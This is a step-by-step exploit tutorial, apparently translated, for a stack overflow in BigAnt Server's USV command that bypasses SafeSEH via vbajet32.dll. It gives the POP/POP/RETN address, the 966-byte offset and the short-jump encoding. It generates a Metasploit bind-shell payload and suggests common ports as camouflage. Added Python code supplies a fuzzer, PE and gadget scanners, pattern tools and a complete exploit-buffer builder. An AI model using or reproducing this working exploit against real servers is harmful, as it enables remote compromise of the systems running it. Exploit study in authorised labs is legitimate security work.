This post discusses how to exploit an application that has protection against buffer overflow attacks. In this application the crash is caught by SEH (Structured Exception Handling), and the handler lookup is protected by SafeSEH. The application under test is BigAnt Server.
BigAnt Server is a messaging server that is widely used in offices. It makes a good example because it is linked with SafeSEH, which means it cannot be exploited with the direct EIP-overwrite (RETN into the buffer) method that worked against WarFTP server.
Fuzzing
A fuzzer written specifically for BigAnt Server is used here; the command being fuzzed is the server's "USV" command. Start BigAnt Server, then attach Immunity Debugger to the antserver.exe process. Note that, unlike the WarFTP fuzzing session, both Immunity Debugger and BigAnt Server must be restarted after every fuzzing run.
(image: the fuzzer script)
(image: Immunity Debugger)
(image: attaching AntServer.exe in Immunity Debugger)
Once antserver.exe is attached and running, send the fuzzer with the following command:
python evil2.py
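The fuzzer itself is not reproduced on the page, so here is an added example of the kind of one-shot script described above. It is not the author's evil2.py: the host and port of the server, the "USV <buffer>\r\n" framing, and the default buffer length are all assumptions that must be adjusted to the lab.

```python
#!/usr/bin/env python3
# Added example (not the author's evil2.py): a one-shot fuzzer for the USV
# command. Host, port and the "USV <buffer>\r\n" framing are assumptions.
import socket
import sys

TARGET_HOST = "192.168.56.101"  # assumption: IP of the Windows VM running AntServer.exe
TARGET_PORT = 6660              # assumption: port AntServer.exe listens on


def build_usv_request(payload: bytes) -> bytes:
    """Wrap a payload in the USV command (the framing is an assumption)."""
    return b"USV " + payload + b"\r\n"


def crash_buffer(length: int, filler: bytes = b"A") -> bytes:
    """Filler of `length` bytes; 0x41 'A' makes overwritten registers read 41414141."""
    return filler * length


def send_once(data: bytes, host: str = TARGET_HOST, port: int = TARGET_PORT,
              timeout: float = 5.0) -> int:
    """Open one TCP connection, send the buffer, return the byte count sent.
    The server has to be restarted between runs, so exactly one buffer is sent."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(data)
    return len(data)


if __name__ == "__main__":
    # assumption: 2500 bytes is comfortably past the SEH record on the stack
    size = int(sys.argv[1]) if len(sys.argv) > 1 else 2500
    request = build_usv_request(crash_buffer(size))
    print(f"[*] sending {len(request)} bytes to {TARGET_HOST}:{TARGET_PORT}")
    send_once(request)
```

Run it as `python evil2.py 2500` with the debugger attached; the buffer length is the only thing to vary between runs.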
(image: AntServer.exe in Immunity Debugger after the fuzzer buffer was sent)
Note what happens in the application's memory.
The application crashes, but unlike the previous case the EIP register is not overwritten by the buffer. This is because the application uses SEH, which catches the exception that occurs. To inspect the handlers, select View → SEH chain.
The buffer that was sent has clearly overwritten the SEH chain. To pass the exception on to the handler, press Shift+F9. EIP now reads 41414141: the overwritten handler address has been loaded into EIP.
Look at the third row of the stack window (bottom right): the buffer sent by the fuzzer is on the stack. That address is also the entry point into the buffer in memory. To view the data, right-click the stack row → Follow in Dump; the memory dump window (bottom left) then shows the buffer contents.
As mentioned earlier, there are several ways to get past SEH, and the most popular is POP, POP, RETN. The stack is a structure of 32-bit (4-byte) slots. POP takes the top slot off the stack into a register; two POPs in a row discard two slots, and RETN then pops the third slot into EIP, so execution continues at whatever address that slot held. When the exception handler is called, that third slot (ESP+8) holds the address of the exception registration record, which is inside the overwritten buffer.
If the SEH handler address is overwritten with the address of a POP, POP, RETN sequence somewhere in memory, control of execution can be obtained almost as easily as with a direct EIP overwrite. The problem is that Windows has a further protection for SEH against buffer overflow attacks: SafeSEH.
More on SafeSEH
With Windows XP SP2 and Windows Server 2003, Microsoft introduced a new safeguard for exception handlers called SafeSEH. SafeSEH is a link-time option (/SAFESEH) that must be enabled when the module is built. When it is used, the linker records a table of the module's legitimate exception handler addresses in the image, and the exception dispatcher only calls a handler whose address appears in that table.
This means that in an SEH exploit using POP, POP, RETN, the address used to redirect the SEH will not be accepted if it is not in the module's SafeSEH table, and the exploit fails.
Besides SafeSEH, Windows XP has another protection embedded in its DLLs: the IMAGE_DLLCHARACTERISTICS_NO_SEH flag. If a DLL carries this flag, no address inside it can be used as an SEH handler, even if the DLL contains a POP, POP, RETN sequence.
There are several approaches to getting around these two protections:
- Use, as the stepping stone that overwrites the SEH, an address from a module that was not linked with /SAFESEH and does not carry IMAGE_DLLCHARACTERISTICS_NO_SEH. Third-party libraries shipped with an application are usually built without either.
- Use a POP, POP, RETN sequence at an address that lies outside any loaded module; the SafeSEH check only applies to addresses inside a module.
- Use an address on the heap.
- Use an address that is already registered as a handler to overwrite the SEH. This usually makes the exploit less reliable, because it is a frequent cause of failure.
- On Windows Server 2003 before SP1, the ATL.dll module could still be used as a springboard to overwrite the SEH address; from SP1 onward this no longer works.
Finding a "Stepping Stone" Address
Finding a stepping stone means finding an address at which a POP, POP, RETN sequence is stored; that address is what will overwrite the application's SEH handler.
Here the first method is used: look for a module loaded by the application that has neither IMAGE_DLLCHARACTERISTICS_NO_SEH nor SafeSEH. There are two ways to look:
- Use an Immunity Debugger plugin written to check the SafeSEH option of each module, such as ImmunitySSEH.
- Check the modules used by the application by hand for those two settings.
With the first option, Immunity Debugger reads all modules loaded by the application and reports whether each of the two protections is ON or OFF. Once a module with both OFF is found, the next step is to locate a POP, POP, RETN address inside it.
The second option is to check each loaded module manually. To see which modules the application loads, use View → Executable Modules. After choosing a candidate springboard module, use msfpescan, a Metasploit tool that reads a module's headers and reports whether either protection is present. If a clean module is found, try overwriting the SEH address with an address from it.
Once again, two things must be confirmed before a module can be used as a stepping stone to overwrite the SEH address:
- The module was not linked with SafeSEH ON.
- The module does not have the IMAGE_DLLCHARACTERISTICS_NO_SEH flag set; this flag is the 0x0400 bit of the PE header's DllCharacteristics field.
Modules without either protection are usually third-party DLLs that are not native to Windows, and they are typically stored in the same folder as the application.
In this case, however, BigAnt Server does not ship any DLLs of its own in the application folder. The next step is to look for DLLs that are not installed on Windows by default. There is no special science to this; it takes general knowledge of Windows and a lot of trial. The classic way is to try every module BigAnt Server loads. Yes, this is very manual and time-consuming, but this is where the "art" of vulnerability development lies: patience and thoroughness.
To keep it short, the author chose a file that is not part of a standard Windows install: vbajet32.dll. Copy vbajet32.dll to the Backtrack system for further analysis; the VirtualBox shared folder feature works well for this.
Once vbajet32.dll is on the Backtrack system (here it is kept in /tmp), run the msfpescan tool that ships with Metasploit. Change to the Metasploit folder on Backtrack, /opt/metasploit/msf3/ (Backtrack 5 R3 is used here), and run the following command:
The command reads the DllCharacteristics field of vbajet32.dll. As discussed, what is needed is certainty that the 0x0400 bit is not set. DllCharacteristics is a 16-bit value, and 0x0400 is bit 2 (counting from 0) of its high byte, so when the flag is set the hex digit for that byte reads 4, 5, 6, 7, C, D, E or F. Those are the values to avoid. In the output the high byte reads B (0x0B00).
B is 1011 in binary, so the 0x0400 bit is clear and the NO_SEH flag is not set on this module. (SafeSEH itself is a separate check: it is indicated by a registered handler table in the image's load config directory, not by DllCharacteristics; msfpescan reports that as well.) With neither protection present, vbajet32.dll can be used as the springboard to overwrite the SEH address in BigAnt Server.
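The two header checks above can be done without msfpescan. The following is an added example, not code from the page or from Metasploit: it parses a 32-bit PE image, reads DllCharacteristics for the 0x0400 NO_SEH bit, and then follows the load config directory to the SEHandlerTable/SEHandlerCount fields that SafeSEH relies on. A small constructed PE32 builder is included so the parser can be exercised offline; the sample it produces is not loadable and stands in for a real DLL such as vbajet32.dll.

```python
# Added example, not from the page or Metasploit: read the two PE header facts
# that decide whether a 32-bit module can serve as an SEH springboard. A
# constructed PE32 image builder is included so the check runs offline.
import struct

IMAGE_DLLCHARACTERISTICS_NO_SEH = 0x0400  # bit 2 of the high byte of DllCharacteristics
LOAD_CONFIG_DIR = 10                      # index of IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG


def _rva_to_offset(rva, sections):
    """Map an RVA to a file offset using the section table."""
    for vaddr, vsize, raw_ptr, raw_size in sections:
        if vaddr <= rva < vaddr + max(vsize, raw_size):
            return rva - vaddr + raw_ptr
    return None


def inspect_seh_protections(data: bytes) -> dict:
    """Return DllCharacteristics, the NO_SEH flag, and whether a SafeSEH handler
    table (SEHandlerTable/SEHandlerCount in IMAGE_LOAD_CONFIG_DIRECTORY32) exists."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = pe + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 images carry a SafeSEH table")
    dllchar = struct.unpack_from("<H", data, opt + 70)[0]
    num_dirs = struct.unpack_from("<I", data, opt + 92)[0]
    sections = []
    for i in range(num_sections):
        vsize, vaddr, raw_size, raw_ptr = struct.unpack_from(
            "<IIII", data, opt + opt_size + i * 40 + 8)
        sections.append((vaddr, vsize, raw_ptr, raw_size))
    table = count = 0
    if num_dirs > LOAD_CONFIG_DIR:
        lc_rva, _ = struct.unpack_from("<II", data, opt + 96 + 8 * LOAD_CONFIG_DIR)
        off = _rva_to_offset(lc_rva, sections) if lc_rva else None
        # the loader trusts the Size field inside the structure, not the directory size
        if off is not None and struct.unpack_from("<I", data, off)[0] >= 72:
            table, count = struct.unpack_from("<II", data, off + 64)
    return {
        "dllcharacteristics": dllchar,
        "no_seh": bool(dllchar & IMAGE_DLLCHARACTERISTICS_NO_SEH),
        "safeseh": table != 0 and count != 0,
        "handler_count": count,
    }


def usable_as_seh_springboard(data: bytes) -> bool:
    """True when neither NO_SEH nor a SafeSEH handler table is present."""
    info = inspect_seh_protections(data)
    return not info["no_seh"] and not info["safeseh"]


def build_sample_pe(dllcharacteristics: int, handler_count: int = 0) -> bytes:
    """Constructed minimal PE32 image (headers + one .rdata section), for testing
    only; it is not loadable. When handler_count > 0 a load config directory
    with a SafeSEH table is written into the section."""
    e_lfanew, opt_size, sec_rva, sec_raw = 0x40, 224, 0x1000, 0x200
    hdr = bytearray(0x200)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, e_lfanew)
    hdr[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    coff = e_lfanew + 4
    # Machine i386, 1 section, no symbols, optional header size, DLL|EXECUTABLE|32BIT
    struct.pack_into("<HHIIIHH", hdr, coff, 0x14C, 1, 0, 0, 0, opt_size, 0x2102)
    opt = coff + 20
    struct.pack_into("<H", hdr, opt, 0x10B)                    # PE32 magic
    struct.pack_into("<H", hdr, opt + 70, dllcharacteristics)
    struct.pack_into("<I", hdr, opt + 92, 16)                  # NumberOfRvaAndSizes
    if handler_count:
        struct.pack_into("<II", hdr, opt + 96 + 8 * LOAD_CONFIG_DIR, sec_rva, 72)
    sec = opt + opt_size
    hdr[sec:sec + 8] = b".rdata\0\0"
    struct.pack_into("<IIII", hdr, sec + 8, 0x200, sec_rva, 0x200, sec_raw)
    body = bytearray(0x200)
    if handler_count:
        struct.pack_into("<I", body, 0, 72)                                # Size
        struct.pack_into("<II", body, 64, sec_rva + 0x80, handler_count)  # SEHandlerTable, SEHandlerCount
    return bytes(hdr + body)
```

Run `inspect_seh_protections(open("vbajet32.dll", "rb").read())` on a real DLL; a module is only a candidate when both `no_seh` and `safeseh` come back False.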
(image: where vbajet32.dll is loaded)
The next step is to find the POP, POP, RETN sequence in this module, which Immunity Debugger can do: View → Executable Modules, double-click vbajet32.dll to open it in the CPU window, then right-click → Search for → Sequence of commands.
In the search window, enter POP r32 / POP r32 / RETN.
Immunity Debugger points to an address in vbajet32.dll that holds a POP, POP, RETN sequence; r32 in the search stands for any 32-bit general-purpose register. The address found is 0F9A196A.
Make sure the address contains no \x00, \x0a or \x0d bytes; otherwise the payload would be cut off at that character and the exploit would fail. 0F9A196A is clean.
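The same search can be scripted over a dump of the module, which also lets the bad-character rule above be applied automatically. This is an added example, not part of the page: it scans a byte image for `pop r32; pop r32; ret` (and `ret imm16`), skips sequences that pop ESP, and drops any candidate whose little-endian address would contain \x00, \x0a or \x0d. The image and base address in the block are constructed for the demonstration; in practice they would come from a memory dump of the loaded module.

```python
# Added example, not from the page: scan a module image for pop r32 / pop r32 / ret
# sequences and drop candidates whose address would contain a bad byte. The
# sample image and base address below are constructed for the demonstration.
import struct

POP_R32 = range(0x58, 0x60)        # one-byte opcodes: pop eax, ecx, edx, ebx, esp, ebp, esi, edi
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
RET, RET_IMM16 = 0xC3, 0xC2        # ret and ret imm16
BAD_CHARS = b"\x00\x0a\x0d"


def address_is_clean(addr: int, bad_chars: bytes = BAD_CHARS) -> bool:
    """True if the little-endian encoding of addr (as it sits in the SEH field) has no bad byte."""
    return not any(b in bad_chars for b in struct.pack("<I", addr))


def find_pop_pop_ret(image: bytes, base: int, bad_chars: bytes = BAD_CHARS):
    """Return [(address, disassembly)] for every pop/pop/ret whose address is clean.
    `image` is the module's bytes in their in-memory layout and `base` its load
    address (assumption: the caller supplies both, e.g. from a memory dump)."""
    found = []
    for i in range(len(image) - 2):
        a, b, c = image[i], image[i + 1], image[i + 2]
        if a not in POP_R32 or b not in POP_R32 or c not in (RET, RET_IMM16):
            continue
        if 0x5C in (a, b):               # pop esp would move the stack pointer; skip it
            continue
        if c == RET_IMM16:
            if i + 5 > len(image):       # ret imm16 needs its two immediate bytes
                continue
            imm = struct.unpack_from("<H", image, i + 3)[0]
            ret_text = f"ret 0x{imm:x}"
        else:
            ret_text = "ret"
        addr = base + i
        if not address_is_clean(addr, bad_chars):
            continue
        found.append((addr, f"pop {REGS[a - 0x58]}; pop {REGS[b - 0x58]}; {ret_text}"))
    return found


# Constructed sample: NOPs, a usable pop ebx / pop ebp / ret, a pop esp sequence
# that must be skipped, and a pop esi / pop edi / ret 4.
SAMPLE_IMAGE = (b"\x90" * 5 + b"\x5b\x5d\xc3" + b"\x90" * 3
                + b"\x58\x5c\xc3" + b"\x90" * 2 + b"\x5e\x5f\xc2\x04\x00")
SAMPLE_BASE = 0x0F9A1960   # assumption: an address range like vbajet32.dll's on the page

if __name__ == "__main__":
    for addr, text in find_pop_pop_ret(SAMPLE_IMAGE, SAMPLE_BASE):
        print(f"{addr:08X}  {text}")
```

Note that the bad-character filter is applied to the address, not to the instructions: an otherwise perfect gadget at an address such as 0x00400005 is useless because the \x00 in its encoding would terminate the buffer.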
Finding the offset that overwrites SEH
Having confirmed that vbajet32.dll can serve as the stepping stone, the next step is to find at which byte of the buffer the SEH address is overwritten. As before, Metasploit's pattern_create is used to generate a unique string pattern that the fuzzer sends to the application.
Close Immunity Debugger and BigAnt Server, start BigAnt Server again, then start Immunity Debugger, attach AntServer, and let the process run. Run the fuzzer loaded with the pattern. BigAnt crashes as before with the pattern in the SEH chain; press Shift+F9 to pass the exception to the handler, record the value in EIP, and look it up with pattern_offset.
pattern_offset gives the following value:
The conclusion is that a buffer of 966 bytes is needed to reach the SEH handler. Next, with the same fuzzer, set the buffer to 966 bytes to check that the calculation is right.
Note the script the author uses: four \xCC bytes are placed just before the point where the buffer reaches the SEH address, and the SEH address itself is overwritten with \x41. Restart Immunity Debugger and BigAnt Server, then run the fuzzer again.
This time Immunity Debugger shows BigAnt crashing with an access violation, and in the SEH chain the \x41 bytes have landed in the SEH handler. The byte count is correct and the layout is as expected.
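For readers without Metasploit at hand, the pattern_create / pattern_offset procedure above and the \xCC/\x41 check buffer are reproduced in the following added example. It is not Metasploit's code and not the author's script; the EIP value used in the test is constructed from the pattern at offset 966 (the page does not show its own EIP dump), and the check buffer's offset is the 966 the page arrived at.

```python
# Added example, not Metasploit's own code: a re-implementation of the
# pattern_create / pattern_offset procedure used above, plus the check buffer
# that places \xCC in the next-SEH field and \x41 in the handler field.
import string
import struct

MAX_UNIQUE = 26 * 26 * 10 * 3   # 20280 bytes before the Metasploit pattern repeats


def pattern_create(length: int) -> bytes:
    """Generate Metasploit's cyclic pattern: Aa0Aa1...Aa9Ab0...Zz9, cut to `length`."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(value, length: int = MAX_UNIQUE):
    """Offset of a 4-byte value in the pattern, or None. `value` may be the dword
    read from EIP (an int, unpacked little-endian) or the 4 bytes in memory order."""
    needle = struct.pack("<I", value) if isinstance(value, int) else bytes(value)
    idx = pattern_create(length).find(needle)
    return idx if idx >= 0 else None


def seh_check_buffer(seh_offset: int) -> bytes:
    """Buffer that should put CC CC CC CC in the next-SEH field and 41 41 41 41 in
    the handler field when `seh_offset` is right (966 on the page)."""
    return b"A" * (seh_offset - 4) + b"\xCC" * 4 + b"\x41" * 4


if __name__ == "__main__":
    # The dword EIP would hold if the handler field were filled from offset 966
    # of the pattern (constructed value; the page does not show its own EIP dump).
    eip = struct.unpack("<I", pattern_create(970)[966:970])[0]
    print(f"EIP {eip:08X} -> offset {pattern_offset(eip)}")
```

A value that is not found (pattern_offset returns None) usually means the register was read from the wrong place, for example before pressing Shift+F9, or that the pattern was longer than 20280 bytes and has started to repeat.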
Controlling the CPU
With the offset to the SEH handler known, enter the address of the POP, POP, RETN in vbajet32.dll into the fuzzer. Remember to write it in little-endian byte order.
Before running the fuzzer, set a breakpoint on the handler address to confirm that the exploit really lands there. Restart Immunity Debugger and BigAnt Server, go to address 0F9A196A in vbajet32.dll with Ctrl+G, and set a breakpoint on it (F2).
Then run the fuzzer.
Immunity Debugger breaks exactly when execution reaches 0F9A196A in vbajet32.dll. To double-check, look at the SEH chain (Alt+S).
Press Shift+F9 to continue into vbajet32.dll, then step with F7 until the RETN. After the RETN, Immunity Debugger lands on the stack: execution is now at the four bytes of the overwritten next-SEH field.
A problem arises: there are only four bytes of space here, not enough for shellcode. Execution has to be moved to an address with more room. To find it, right-click the first \xCC byte (0160FD7D) → Follow in Dump → Selection; Immunity Debugger shows the stack memory in the dump window (bottom left).
Below the \xCC bytes there is a large region filled with the fuzzer's \x90 padding, starting at 0160FD85. Subtracting the start from the end of the region (0160FD85 to 0160FFFD) gives, by the author's count, 0x27B or 635 bytes. Alternatively there is the empty space before the \xCC bytes, from 0160F000 up to 0160F138, which the author puts at 0x3C1 or 961 bytes. Either is enough for the shellcode.
To move the CPU from the four-byte next-SEH slot into the empty space that follows the SEH address, use JMP SHORT. JMP SHORT tells the CPU to jump forward by a number of bytes chosen by the user and continue execution there.
In assembly, JMP SHORT is encoded as \xEB\xZZ, where ZZ is the displacement in bytes, counted from the end of the 2-byte instruction. \xEB\x02 jumps two bytes past the instruction.
To reach the space on the stack, a jump of 8 bytes is needed: it skips the 2 remaining bytes of the next-SEH field and the 4-byte SEH address, and lands 2 bytes into the NOP area that follows. The next-SEH field therefore becomes \xEB\x08\x90\x90. Next, make the shellcode with Metasploit.
Making the shellcode
The shellcode used here opens port 4444 on the target system. Remember that the available space is 635 bytes minus the 16 NOP bytes placed before the shellcode. Use msfweb to generate the payload.
The author uses Windows Bind Shell with PORT 4444 as the port to connect to. It can be changed to a port that is commonly open on Windows systems, such as 443, 80 or 22, as camouflage. The default encoder is shikata_ga_nai. The result is shown below.
Put the payload, the 16 NOPs and the JMP SHORT into the fuzzer, and run the exploit against BigAnt Server.
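The following added example assembles the final buffer from the values the page has established (handler field at offset 966, POP/POP/RETN at 0x0F9A196A, \xEB\x08\x90\x90 in the next-SEH field, a 16-byte NOP sled, 635 bytes of room) and decodes it again to show where the short jump lands. It is not the author's fuzzer, and the shellcode in it is a constructed stand-in (an int3 sled), not the msfweb bind-shell payload; the assembled buffer would be passed to the fuzzer's USV framing in place of the plain filler.

```python
# Added example, not the author's fuzzer: assemble the final buffer from the
# values established on the page and decode it back to check where the short
# jump lands. The shellcode is a constructed stand-in, not the msfweb payload.
import struct

SEH_OFFSET = 966                   # offset of the SEH handler field (page)
PPR_ADDRESS = 0x0F9A196A           # pop, pop, retn in vbajet32.dll (page)
NOP_SLED = b"\x90" * 16
NSEH = b"\xEB\x08" + b"\x90\x90"   # jmp short +8, then two pad bytes
SPACE_AFTER_SEH = 635              # room after the handler field (page)
BAD_CHARS = b"\x00\x0a\x0d"


def has_bad_chars(blob: bytes, bad_chars: bytes = BAD_CHARS) -> bool:
    """True if any byte of blob would truncate the buffer."""
    return any(b in bad_chars for b in blob)


def build_exploit(shellcode: bytes, seh_offset: int = SEH_OFFSET,
                  handler: int = PPR_ADDRESS) -> bytes:
    """Layout: filler | nSEH (jmp short) | handler (little-endian) | NOP sled | shellcode."""
    if len(NOP_SLED) + len(shellcode) > SPACE_AFTER_SEH:
        raise ValueError("sled + shellcode exceed the space after the SEH record")
    packed = struct.pack("<I", handler)
    if has_bad_chars(packed):
        raise ValueError("handler address contains a bad character")
    if has_bad_chars(shellcode):
        raise ValueError("shellcode contains a bad character; re-encode it")
    return b"A" * (seh_offset - 4) + NSEH + packed + NOP_SLED + shellcode


def decode_layout(buf: bytes, seh_offset: int = SEH_OFFSET) -> dict:
    """Read the fields back. The short jump's target is the end of the 2-byte
    instruction plus its signed displacement, measured from the start of nSEH."""
    nseh_at = seh_offset - 4
    nseh = buf[nseh_at:seh_offset]
    handler = struct.unpack_from("<I", buf, seh_offset)[0]
    disp = struct.unpack("<b", nseh[1:2])[0] if nseh[0] == 0xEB else None
    landing = nseh_at + 2 + disp if disp is not None else None
    return {"nseh": nseh, "handler": handler, "landing": landing,
            "sled_start": seh_offset + 4,
            "sled_end": seh_offset + 4 + len(NOP_SLED)}


# Constructed stand-in for the encoded bind-shell payload: an int3 sled.
FAKE_SHELLCODE = b"\xCC" * 32

if __name__ == "__main__":
    buf = build_exploit(FAKE_SHELLCODE)
    info = decode_layout(buf)
    print(f"handler {info['handler']:08X}, jmp lands at {info['landing']}, "
          f"sled {info['sled_start']}-{info['sled_end'] - 1}, total {len(buf)} bytes")
```

With the stand-in shellcode the jump lands at offset 972, two bytes into the sled that starts at 970, which is exactly why the sled is there: the exact landing spot does not have to coincide with the first shellcode byte.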
Before running the fuzzer, check that the breakpoint on the SEH address is still set in Immunity Debugger, so that the exploit can be watched step by step. Run the fuzzer and watch what happens.
The SEH entry holds the correct value: it points into vbajet32.dll.
Then send the fuzzer, open a terminal on Backtrack 5 R3 and type the following command:
We are now on the Windows system running BigAnt Server.
Good luck.